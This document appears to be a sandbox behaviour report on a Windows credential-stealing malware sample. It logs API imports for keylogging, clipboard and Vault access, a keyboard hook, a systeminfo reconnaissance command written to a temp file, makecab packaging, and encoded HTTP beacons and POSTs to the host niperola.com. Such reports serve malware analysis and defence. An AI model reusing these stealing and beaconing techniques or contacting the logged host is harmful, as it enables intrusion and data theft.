Get Address Unknown module name function = RegOpenKeyA, address_out = 0x7ff976f9b9e0 True 1
Fn
Get Address Unknown module name function = RegQueryValueExA, address_out = 0x7ff976f97dd0 True 1
Fn
Get Address Unknown module name function = RegCloseKey, address_out = 0x7ff976f972e0 True 1
Fn
Get Address Unknown module name function = StrToIntExA, address_out = 0x7ff977374e70 True 1
Fn
Get Address Unknown module name function = StrChrA, address_out = 0x7ff977374cc0 True 1
Fn
Get Address Unknown module name function = StrTrimA, address_out = 0x7ff977374e80 True 1
Fn
Get Address Unknown module name function = GetUserNameA, address_out = 0x7ff976faec40 True 1
Fn
Get Address Unknown module name function = EnumProcessModules, address_out = 0x7ff977821040 True 1
Fn
Get Address Unknown module name function = StrStrIW, address_out = 0x7ff97736b260 True 1
Fn
Get Address Unknown module name function = RegEnumValueW, address_out = 0x7ff976f97220 True 1
Fn
Get Address Unknown module name function = RegSetValueExA, address_out = 0x7ff976f82680 True 1
Fn
Get Address Unknown module name function = RegCreateKeyA, address_out = 0x7ff976fc6dc0 True 1
Fn
Get Address Unknown module name function = RegOpenKeyExA, address_out = 0x7ff976f97d70 True 1
Fn
Get Address Unknown module name function = CreateStreamOnHGlobal, address_out = 0x7ff9778570a0 True 1
Fn
Get Address Unknown module name function = PathFindFileNameA, address_out = 0x7ff97736cf30 True 1
Fn
Get Address Unknown module name function = SetWindowsHookExA, address_out = 0x7ff9757b27a0 True 1
Fn
Get Address Unknown module name function = RegisterClassA, address_out = 0x7ff9757d1310 True 1
Fn
Get Address Unknown module name function = CreateWindowExA, address_out = 0x7ff9757d4df0 True 1
Fn
Get Address Unknown module name function = GetWindowLongPtrA, address_out = 0x7ff9757bcae0 True 1
Fn
Get Address Unknown module name function = DefWindowProcA, address_out = 0x7ff977fc3230 True 1
Fn
Get Address Unknown module name function = SetWindowLongPtrA, address_out = 0x7ff9757c61f0 True 1
Fn
Get Address Unknown module name function = GetMessageA, address_out = 0x7ff9757caa50 True 1
Fn
Get Address Unknown module name function = TranslateMessage, address_out = 0x7ff9757c36a0 True 1
Fn
Get Address Unknown module name function = DispatchMessageA, address_out = 0x7ff9757d61e0 True 1
Fn
Get Address Unknown module name function = SetClipboardViewer, address_out = 0x7ff9757e0de0 True 1
Fn
Get Address Unknown module name function = PostMessageA, address_out = 0x7ff9757d4900 True 1
Fn
Get Address Unknown module name function = OpenClipboard, address_out = 0x7ff9757db6c0 True 1
Fn
Get Address Unknown module name function = GetClipboardData, address_out = 0x7ff9757daba0 True 1
Fn
Get Address Unknown module name function = CloseClipboard, address_out = 0x7ff9757e0920 True 1
Fn
Get Address Unknown module name function = StrCmpIW, address_out = 0x7ff97736be50 True 1
Fn
Get Address Unknown module name function = RegNotifyChangeKeyValue, address_out = 0x7ff976f98fd0 True 1
Fn
Get Address Unknown module name function = CoInitializeEx, address_out = 0x7ff9778a3170 True 1
Fn
Get Address Unknown module name function = RegEnumKeyExA, address_out = 0x7ff976f825d0 True 1
Fn
Get Address Unknown module name function = SHGetFolderPathW, address_out = 0x7ff9759e0080 True 1
Fn
Get Address Unknown module name function = PathCombineW, address_out = 0x7ff97736d130 True 1
Fn
Get Address Unknown module name function = PathMatchSpecW, address_out = 0x7ff977374990 True 1
Fn
Get Address Unknown module name function = IsTextUnicode, address_out = 0x7ff976f96c80 True 1
Fn
Get Address Unknown module name function = RegOpenKeyExW, address_out = 0x7ff976f96cb0 True 1
Fn
Get Address Unknown module name function = CryptAcquireContextW, address_out = 0x7ff976f989e0 True 1
Fn
Get Address Unknown module name function = CryptCreateHash, address_out = 0x7ff976f97bf0 True 1
Fn
Get Address Unknown module name function = CryptHashData, address_out = 0x7ff976f97d80 True 1
Fn
Get Address Unknown module name function = CryptGetHashParam, address_out = 0x7ff976f97970 True 1
Fn
Get Address Unknown module name function = CryptDestroyHash, address_out = 0x7ff976f986a0 True 1
Fn
Get Address Unknown module name function = CryptReleaseContext, address_out = 0x7ff976f98ee0 True 1
Fn
Get Address Unknown module name function = PathFindExtensionA, address_out = 0x7ff977374800 True 1
Fn
Get Address Unknown module name function = StrRChrW, address_out = 0x7ff97736dd80 True 1
Fn
Get Address Unknown module name function = CoCreateInstance, address_out = 0x7ff9778b7000 True 1
Fn
Get Address Unknown module name function = FindFirstUrlCacheEntryA, address_out = 0x7ff96b132120 True 1
Fn
Get Address Unknown module name function = StrChrW, address_out = 0x7ff97736a2a0 True 1
Fn
Get Address Unknown module name function = StrStrIA, address_out = 0x7ff97736e1c0 True 1
Fn
Get Address Unknown module name function = FindNextUrlCacheEntryA, address_out = 0x7ff96b107bf0 True 1
Fn
Get Address Unknown module name function = VaultOpenVault, address_out = 0x7ff968362310 True 1
Fn
Get Address Unknown module name function = VaultCloseVault, address_out = 0x7ff9683623a0 True 1
Fn
Get Address Unknown module name function = VaultEnumerateItems, address_out = 0x7ff9683621c0 True 1
Fn
Get Address Unknown module name function = VaultGetItem, address_out = 0x7ff968361ff0 True 2
Fn
Get Address Unknown module name function = VaultFree, address_out = 0x7ff96836e340 True 1
Fn
Get Address Unknown module name function = FindCloseUrlCache, address_out = 0x7ff96b0d2470 True 1
Fn
Get Address Unknown module name function = InternetCanonicalizeUrlA, address_out = 0x7ff96b1a71b0 True 1
Fn
Get Address Unknown module name function = InternetOpenA, address_out = 0x7ff96b0a1400 True 1
Fn
Get Address Unknown module name function = InternetSetStatusCallback, address_out = 0x7ff96b1356e0 True 1
Fn
Get Address Unknown module name function = InternetConnectA, address_out = 0x7ff96b1a78f0 True 1
Fn
Get Address Unknown module name function = HttpOpenRequestA, address_out = 0x7ff96b1d30a0 True 1
Fn
Get Address Unknown module name function = InternetQueryOptionA, address_out = 0x7ff96b0a3cc0 True 1
Fn
Get Address Unknown module name function = InternetSetOptionA, address_out = 0x7ff96b0b7f00 True 1
Fn
Get Address Unknown module name function = HttpSendRequestA, address_out = 0x7ff96b083330 True 1
Fn
Get Address Unknown module name function = CoUninitialize, address_out = 0x7ff9778a2380 True 1
Fn
Get Address Unknown module name function = RegEnumKeyExW, address_out = 0x7ff976f97180 True 1
Fn
Get Address Unknown module name function = InternetReadFile, address_out = 0x7ff96b0a3350 True 1
Fn
Get Address Unknown module name function = HttpQueryInfoA, address_out = 0x7ff96b0b7140 True 1
Fn
Get Address Unknown module name function = InternetCloseHandle, address_out = 0x7ff96b0de110 True 1
Fn
Get Address Unknown module name function = 92, address_out = 0x7ff975b21c90 True 1
Fn
Get Address Unknown module name function = PathIsDirectoryEmptyA, address_out = 0x7ff977376840 True 1
Fn
Get Address Unknown module name function = CoCreateGuid, address_out = 0x7ff9778a2340 True 1
Fn
Get Address Unknown module name function = RegEnumValueA, address_out = 0x7ff976fb0f00 True 1
Fn
Get Address Unknown module name function = HttpAddRequestHeadersA, address_out = 0x7ff96b0ef3e0 True 1
Fn
Get Address Unknown module name function = RegDeleteValueA, address_out = 0x7ff976f82960 True 1
Fn
Create Mapping C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin filename = C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin, protection = PAGE_READONLY, maximum_size = 161 True 1
Fn
Map C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin process_name = c:\windows\explorer.exe, desired_access = FILE_MAP_READ True 1
Fn
Window (2)
Operation Window Name Additional Information Success Count Logfile
Create - class_name = {D2E83952-8889-7854-A6A3-3A87C8CD7C51}, wndproc_parameter = 122648704 True 1
Fn
Create - class_name = {24B7E16E-39F5-82D0-82EF-D69304F9783D}, wndproc_parameter = 122648336 True 1
Fn
System (51)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = LHNIWSJ True 1
Fn
Get Clipboard format = 1 False 1
Fn
Sleep duration = -1 (infinite) False 4
Fn
Sleep duration = -1 (infinite) True 18
Fn
Sleep duration = 10000 milliseconds (10.000 seconds) True 6
Fn
Sleep duration = 60000 milliseconds (60.000 seconds) True 4
Fn
Get Time type = Ticks, time = 110515 True 1
Fn
Get Time type = System Time, time = 2018-11-06 00:26:56 (UTC) True 1
Fn
Get Time type = Ticks, time = 110843 True 1
Fn
Get Time type = Ticks, time = 110859 True 1
Fn
Get Time type = System Time, time = 2018-11-06 00:27:36 (UTC) True 1
Fn
Get Time type = Ticks, time = 151093 True 1
Fn
Get Time type = Ticks, time = 151234 True 2
Fn
Get Time type = System Time, time = 2018-11-06 00:27:38 (UTC) True 1
Fn
Get Time type = Ticks, time = 154562 True 2
Fn
Get Time type = Ticks, time = 164375 True 1
Fn
Get Time type = Ticks, time = 164390 True 1
Fn
Get Time type = System Time, time = 2018-11-06 00:27:49 (UTC) True 1
Fn
Register Hook type = WH_KEYBOARD_LL, hookproc_address = 0x74c045c True 1
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Operating System True 1
Fn
Mutex (11)
Operation Additional Information Success Count Logfile
Create mutex_name = {0AA2BFE1-E129-CCB9-BBDE-A5C01FF2A9F4} True 1
Fn
Create mutex_name = Local\{6C433A47-DB67-7E7B-C560-3F92C994E3E6} True 1
Fn
Create mutex_name = Local\{FB999B87-1EC7-E503-005F-32E93403862D} True 1
Fn
Create mutex_name = Local\{53667D0F-9637-FD89-3837-2A81EC5BFE45} True 1
Fn
Open mutex_name = Local\{6C433A47-DB67-7E7B-C560-3F92C994E3E6}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE False 1
Fn
Open mutex_name = Local\{FB999B87-1EC7-E503-005F-32E93403862D}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE False 1
Fn
Open mutex_name = Local\{53667D0F-9637-FD89-3837-2A81EC5BFE45}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE False 1
Fn
Open mutex_name = Local\{6C433A47-DB67-7E7B-C560-3F92C994E3E6}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Open mutex_name = Local\{FB999B87-1EC7-E503-005F-32E93403862D}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Open mutex_name = Local\{53667D0F-9637-FD89-3837-2A81EC5BFE45}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Release mutex_name = Local\{FB999B87-1EC7-E503-005F-32E93403862D} True 1
Fn
Network Behavior
HTTP Sessions (2)
Information Value
Total Data Sent 923 bytes
Total Data Received 8 bytes
Contacted Host Count 1
Contacted Hosts niperola.com
HTTP Session #1
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
Server Name niperola.com
Server Port 443
Data Sent 447
Data Received 4
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64), access_type = INTERNET_OPEN_TYPE_PRECONFIG, flags = INTERNET_FLAG_ASYNC True 1
Fn
Open Connection protocol = HTTP, server_name = niperola.com, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif, accept_types = 0, flags = INTERNET_FLAG_CACHE_ASYNC, INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = niperola.com/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif False 1
Fn
Read Response size = 4096, size_out = 0 True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Close Session - True 2
Fn
HTTP Session #2
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
Server Name niperola.com
Server Port 443
Data Sent 476
Data Received 4
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64), access_type = INTERNET_OPEN_TYPE_PRECONFIG, flags = INTERNET_FLAG_ASYNC True 1
Fn
Open Connection protocol = HTTP, server_name = niperola.com, server_port = 443 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp, accept_types = 0, flags = INTERNET_FLAG_CACHE_ASYNC, INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Content-Type: multipart/form-data; boundary=--------------------------1152aa61152aa61152aa6 True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = niperola.com/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp False 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Close Session - True 2
Fn
Process #13: cmd.exe
Information Value
ID #13
File Name c:\windows\system32\cmd.exe
Command Line cmd /C "systeminfo.exe > C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:10, Reason: Child Process
Unmonitor End Time: 00:04:24, Reason: Self Terminated
Monitor Duration 00:00:14
OS Process Information
Information Value
PID 0xbf0
Parent PID 0x834 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x9C4
0xBD4
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x0000004a21dc0000 0x4a21dc0000 0x4a21ddffff Private Memory rw True False False -
pagefile_0x0000004a21dc0000 0x4a21dc0000 0x4a21dcffff Pagefile Backed Memory rw True False False -
private_0x0000004a21dd0000 0x4a21dd0000 0x4a21dd6fff Private Memory rw True False False -
pagefile_0x0000004a21de0000 0x4a21de0000 0x4a21df3fff Pagefile Backed Memory r True False False -
private_0x0000004a21e00000 0x4a21e00000 0x4a21efffff Private Memory rw True False False -
pagefile_0x0000004a21f00000 0x4a21f00000 0x4a21f03fff Pagefile Backed Memory r True False False -
pagefile_0x0000004a21f10000 0x4a21f10000 0x4a21f10fff Pagefile Backed Memory r True False False -
private_0x0000004a21f20000 0x4a21f20000 0x4a21f21fff Private Memory rw True False False -
locale.nls 0x4a21f30000 0x4a21fedfff Memory Mapped File r False False False -
private_0x0000004a21ff0000 0x4a21ff0000 0x4a21ff6fff Private Memory rw True False False -
private_0x0000004a22000000 0x4a22000000 0x4a220fffff Private Memory rw True False False -
private_0x0000004a22100000 0x4a22100000 0x4a221fffff Private Memory rw True False False -
private_0x0000004a22220000 0x4a22220000 0x4a2222ffff Private Memory rw True False False -
sortdefault.nls 0x4a22230000 0x4a22566fff Memory Mapped File r False False False -
pagefile_0x00007df5ff210000 0x7df5ff210000 0x7ff5ff20ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff60caa0000 0x7ff60caa0000 0x7ff60cb9ffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff60cba0000 0x7ff60cba0000 0x7ff60cbc2fff Pagefile Backed Memory r True False False -
private_0x00007ff60cbcb000 0x7ff60cbcb000 0x7ff60cbccfff Private Memory rw True False False -
private_0x00007ff60cbcd000 0x7ff60cbcd000 0x7ff60cbcdfff Private Memory rw True False False -
private_0x00007ff60cbce000 0x7ff60cbce000 0x7ff60cbcffff Private Memory rw True False False -
cmd.exe 0x7ff60d9c0000 0x7ff60da18fff Memory Mapped File rwx True False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Created Files
Filename File Size Hash Values YARA Match Actions
C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 2.18 KB MD5: a6df774d816b209411b2333a5b9ec424
SHA1: 51fff99e39c47cfec686851612a455f379bb2aad
SHA256: f2014faf873ca57b633b8fa4ca50b8e43ceb9a702d22d1c64c0e77b3adaed138
SSDeep: 48:wtjQxD3CK4PCX1iUkkJGK/JIj3fG7XhygKYhkTNY/uEMcCGEi6wM8w0:wtjQxDyVCX1TvQ3EKYeTTOEi6H8w0
False
C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 2.10 KB MD5: 509553efe36a0a3e6d316481927a6140
SHA1: ed902b212b4fbd216da77d029b470c3f4e9b6792
SHA256: f1c8d9f360fcd68ee7457dcba1138f72958bf67d04eacbea9ff19709dd0415d9
SSDeep: 48:wtjQxD3CK4PCX1iUkkJGK/JIj3fG7XhygKYhkTNY/uEMcCGEi6wMw:wtjQxDyVCX1TvQ3EKYeTTOEi6Hw
False
C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 2.07 KB MD5: c46a15454bdd7e5e261bd0233d5f4292
SHA1: 1991f9352757223744120ce3ff58a2b4d8f74084
SHA256: de78c3da8402e55106baea673ecd23bd774f9c32ba553dd19876edd512fe213a
SSDeep: 48:wtjQxD3CK4PCX1iUkkJGK/JIj3fG7XhygKYhkTNY/uEMcCGEi6wM2:wtjQxDyVCX1TvQ3EKYeTTOEi6H2
False
C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 2.08 KB MD5: 341fcd9604b64893ae0005256b5ce72b
SHA1: 2b009bf647e0e2647dfeeea2ef9a835488f90592
SHA256: 51107a8da1ccf7d83630c641ce38123bc78289e8f4c2b7c6d0b2afc8092bb4d7
SSDeep: 48:wtjQxD3CK4PCX1iUkkJGK/JIj3fG7XhygKYhkTNY/uEMcCGEi6wMT:wtjQxDyVCX1TvQ3EKYeTTOEi6HT
False
Host Behavior
File (17)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Get Info systeminfo.exe type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 9
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\systeminfo.exe os_pid = 0xbd0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff60d9c0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ff977ab0000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ff977acd550 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ff977ad25e0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ff977ad1f90 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ff975423a10 True 1
Fn
Environment (19)
Operation Additional Information Success Count Logfile
Get Environment String - True 7
Fn
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #15: makecab.exe
Information Value
ID #15
File Name c:\windows\system32\makecab.exe
Command Line makecab.exe /F "C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin"
Initial Working Directory C:\Users\CIIHMN~1\AppData\Roaming\MICROS~1\{25E2F~1\
Monitor Start Time: 00:04:12, Reason: Child Process
Unmonitor End Time: 00:04:17, Reason: Self Terminated
Monitor Duration 00:00:05
OS Process Information
Information Value
PID 0x200
Parent PID 0x834 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x20C
0xBD8
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x00000027e8740000 0x27e8740000 0x27e875ffff Private Memory rw True False False -
pagefile_0x00000027e8740000 0x27e8740000 0x27e874ffff Pagefile Backed Memory rw True False False -
private_0x00000027e8750000 0x27e8750000 0x27e8756fff Private Memory rw True False False -
pagefile_0x00000027e8760000 0x27e8760000 0x27e8773fff Pagefile Backed Memory r True False False -
private_0x00000027e8780000 0x27e8780000 0x27e87fffff Private Memory rw True False False -
pagefile_0x00000027e8800000 0x27e8800000 0x27e8803fff Pagefile Backed Memory r True False False -
pagefile_0x00000027e8810000 0x27e8810000 0x27e8811fff Pagefile Backed Memory r True False False -
private_0x00000027e8820000 0x27e8820000 0x27e8821fff Private Memory rw True False False -
private_0x00000027e8830000 0x27e8830000 0x27e8836fff Private Memory rw True False False -
private_0x00000027e8840000 0x27e8840000 0x27e8840fff Private Memory rw True False False -
private_0x00000027e8850000 0x27e8850000 0x27e8850fff Private Memory rw True False False -
private_0x00000027e8860000 0x27e8860000 0x27e895ffff Private Memory rw True False False -
locale.nls 0x27e8960000 0x27e8a1dfff Memory Mapped File r False False False -
private_0x00000027e8a20000 0x27e8a20000 0x27e8a9ffff Private Memory rw True False False -
tzres.dll 0x27e8aa0000 0x27e8aa2fff Memory Mapped File r False False False -
private_0x00000027e8aa0000 0x27e8aa0000 0x27e8b9ffff Private Memory rw True False False -
tzres.dll.mui 0x27e8ab0000 0x27e8ab8fff Memory Mapped File r False False False -
private_0x00000027e8c10000 0x27e8c10000 0x27e8c1ffff Private Memory rw True False False -
pagefile_0x00000027e8c20000 0x27e8c20000 0x27e8da7fff Pagefile Backed Memory r True False False -
pagefile_0x00000027e8db0000 0x27e8db0000 0x27e8f30fff Pagefile Backed Memory r True False False -
pagefile_0x00000027e8f40000 0x27e8f40000 0x27ea33ffff Pagefile Backed Memory r True False False -
pagefile_0x00007df5ffac0000 0x7df5ffac0000 0x7ff5ffabffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff6a2b50000 0x7ff6a2b50000 0x7ff6a2c4ffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff6a2c50000 0x7ff6a2c50000 0x7ff6a2c72fff Pagefile Backed Memory r True False False -
private_0x00007ff6a2c79000 0x7ff6a2c79000 0x7ff6a2c79fff Private Memory rw True False False -
private_0x00007ff6a2c7c000 0x7ff6a2c7c000 0x7ff6a2c7dfff Private Memory rw True False False -
private_0x00007ff6a2c7e000 0x7ff6a2c7e000 0x7ff6a2c7ffff Private Memory rw True False False -
makecab.exe 0x7ff6a3bf0000 0x7ff6a3c09fff Memory Mapped File rwx True False False -
version.dll 0x7ff96c360000 0x7ff96c369fff Memory Mapped File rwx False False False -
cabinet.dll 0x7ff96dd40000 0x7ff96dd66fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
user32.dll 0x7ff9757b0000 0x7ff9758fdfff Memory Mapped File rwx False False False -
msctf.dll 0x7ff977200000 0x7ff97735bfff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
gdi32.dll 0x7ff9774c0000 0x7ff977644fff Memory Mapped File rwx False False False -
imm32.dll 0x7ff977720000 0x7ff977755fff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Created Files
Filename File Size Hash Values YARA Match Actions
setup.inf 0.93 KB MD5: b19102f1fce46e8be9ee9b154917a7a4
SHA1: fc7190a4a81ea424ac85b37774a30e2f2d5fa233
SHA256: 14285549114d443547dcdc8b136bdb5b334841d887c34aff6cc8881fe217614a
SSDeep: 12:QxncDimwRgSqnsP2neJhe5CbkIncDimwRgSqnhIv:QF8vwAn02nKheYbt8vwAnw
False
C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_6 0.03 KB MD5: 2a6e424d0341f1e9525fbe2fdc03c286
SHA1: 69e1ad0e32574aea0ff284091e6c00252ae6295c
SHA256: 6965f7cc58394ae528c6ff61cc1684662a1ae2851de0136d46b6ca428fefa072
SSDeep: 3:avIcn:M
